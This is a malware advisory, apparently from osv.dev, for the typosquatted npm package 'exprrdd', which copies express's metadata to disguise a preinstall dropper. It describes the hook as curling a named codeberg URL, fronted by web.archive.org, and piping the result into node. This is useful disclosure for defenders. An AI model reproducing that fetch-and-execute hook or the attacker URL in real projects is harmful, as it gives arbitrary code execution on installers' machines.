exprrdd@5.2.1
Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC
OSV ID
MAL-2026-17244
Ecosystem
npm
Summary
Package 'exprrdd' copies express's metadata (name-lookalike, description, author, contributors, repository, keywords, dependencies) as cover for a preinstall dropper. package.json line 98 declares a preinstall script that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js and pipes the response directly into node, executing attacker-controlled JavaScript on the installer's machine at npm install time. The fetched script is unpinned and mutable (a raw branch URL fronted by a web.archive.org rewrite), so whoever controls the codeberg.org/hellscripter repository gains arbitrary code execution on every host that installs this package. The typosquat name maximizes accidental installs by developers mistyping 'express'.
Source: amazon-inspector (bc1c956097cd13e80298a796a5026ebd91ece7c2ad53d226d3729f0b0b0ee9f3)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.